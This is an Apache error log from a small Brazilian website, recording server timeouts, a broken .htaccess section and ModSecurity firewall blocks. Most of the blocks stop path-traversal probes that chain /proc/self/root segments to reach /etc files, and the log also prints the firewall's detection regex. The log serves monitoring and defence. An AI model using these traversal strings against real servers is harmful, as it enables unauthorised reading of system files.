[Thu Mar 19 01:21:40.455666 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:50112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt50-yqAr6etmhZHNoYXAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:21:44.132822 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43302] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:21:49.890162 2026] [mime_magic:error] [pid 14269:tid 140411624429312] (70014)End of file found: [client 57.141.18.99:43974] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:22:07.128053 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43754] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:22:12.093639 2026] [core:alert] [pid 17653:tid 140411666392832] [client 74.7.241.31:60534] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/systemd/user
[Thu Mar 19 01:22:30.121794 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44204] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:22:40.145131 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.228.61:47518] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt6EPu8EFLIOrSqIptOwgAAAlI"]
[Thu Mar 19 01:22:45.121977 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:58490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt6FeoXxyEfFpUF8f_F0gAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:22:52.125815 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:23:11.092720 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:42168] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware
[Thu Mar 19 01:23:14.839642 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45136] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:23:23.793795 2026] [mime_magic:error] [pid 30077:tid 140411565680384] (70014)End of file found: [client 57.141.18.97:46274] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:23:40.125998 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45598] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:24:08.137229 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:46120] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:24:19.686526 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:33968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt6cwkwaGbbGflqUZBkxwAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 01:24:36.121834 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:24:49.268345 2026] [mime_magic:error] [pid 31803:tid 140411616036608] (70014)End of file found: [client 57.141.18.16:48578] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:24:57.475137 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.241.31:46140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt6mf-YZRR_7pZ7nDJCUwAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:25:08.057806 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47318] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:25:28.347136 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.243.128:42616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt6uBkFeYa1D6dYQnCgcgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:25:36.129782 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:26:04.093889 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48426] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:26:11.429133 2026] [core:alert] [pid 27403:tid 140411674785536] [client 57.141.18.51:50256] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:26:29.125814 2026] [proxy_fcgi:error] [pid 19093:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:26:47.497222 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.243.128:36324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt7B_-YZRR_7pZ7nDJCkAAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:26:53.428088 2026] [mime_magic:error] [pid 26799:tid 140411708356352] (70014)End of file found: [client 57.141.18.120:51452] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:26:57.164492 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49512] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:27:03.272568 2026] [mime_magic:error] [pid 17653:tid 140411565680384] (70014)End of file found: [client 57.141.18.2:51608] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:27:19.121322 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:27:42.126552 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50564] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:28:04.962195 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51000] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:28:28.136630 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:28:33.410957 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.243.128:50468] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt7cf-YZRR_7pZ7nDJCyAAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:28:50.081870 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:29:13.069841 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52522] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:29:20.952029 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:54146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt7oBkFeYa1D6dYQnChCwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:29:25.652082 2026] [core:alert] [pid 19093:tid 140411641214720] [client 57.141.18.53:54962] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:29:36.146212 2026] [proxy_fcgi:error] [pid 27403:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53072] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:30:02.649776 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53722] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:30:08.875206 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.244.43:56718] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt70F_V7PWP6ixUYl5wTgAAApM"]
[Thu Mar 19 01:30:18.549929 2026] [mime_magic:error] [pid 15826:tid 140411632822016] (70014)End of file found: [client 57.141.18.121:56220] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:30:25.711763 2026] [mime_magic:error] [pid 27293:tid 140411574073088] (70014)End of file found: [client 57.141.18.124:56370] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:30:31.147903 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54358] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:31:01.125952 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:31:29.123270 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55706] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:31:49.458253 2026] [core:alert] [pid 17653:tid 140411674785536] [client 57.141.18.71:58348] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:31:56.029840 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:32:17.121536 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:32:17.922497 2026] [core:alert] [pid 30077:tid 140411725141760] [client 57.141.18.107:58934] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:32:40.131344 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57316] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:32:41.350889 2026] [core:alert] [pid 17887:tid 140411574073088] [client 57.141.18.90:59554] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:32:41.351215 2026] [core:alert] [pid 17653:tid 140411708356352] [client 57.141.18.27:59628] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:32:49.986031 2026] [core:alert] [pid 30077:tid 140411565680384] [client 57.141.18.107:59906] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:32:51.767722 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.228.61:39406] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt8c8df6f5d65gmYZQmwQAAAs4"]
[Thu Mar 19 01:33:06.122564 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:57898] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:33:28.212078 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:60658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt8mPu8EFLIOrSqIptQIwAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:33:32.137807 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58504] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:33:55.125965 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:34:01.817547 2026] [core:alert] [pid 15826:tid 140411574073088] [client 57.141.18.113:33250] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:34:19.117850 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:34:44.101844 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:35:04.860449 2026] [core:alert] [pid 27403:tid 140411674785536] [client 57.141.18.88:34928] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:35:08.153828 2026] [proxy_fcgi:error] [pid 19093:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60816] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:35:12.420633 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.244.43:55700] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt9AOyqAr6etmhZHNoaDAAAAFI"]
[Thu Mar 19 01:35:23.309916 2026] [core:alert] [pid 27293:tid 140411590858496] [client 57.141.18.107:35228] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:35:33.144518 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:35:48.208421 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:33844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt9JAbLMZ6AikZjR9USlQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Thu Mar 19 01:35:50.710313 2026] [core:alert] [pid 14269:tid 140411708356352] [client 57.141.18.99:36120] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:35:51.434343 2026] [mime_magic:error] [pid 17887:tid 140411691570944] (70014)End of file found: [client 57.141.18.99:36042] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:35:54.206958 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:43072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt9Kl_V7PWP6ixUYl5w8QAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:35:58.082915 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33782] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:36:27.129880 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:36:57.161838 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35188] AH01075: Error dispatching request to : (polling)
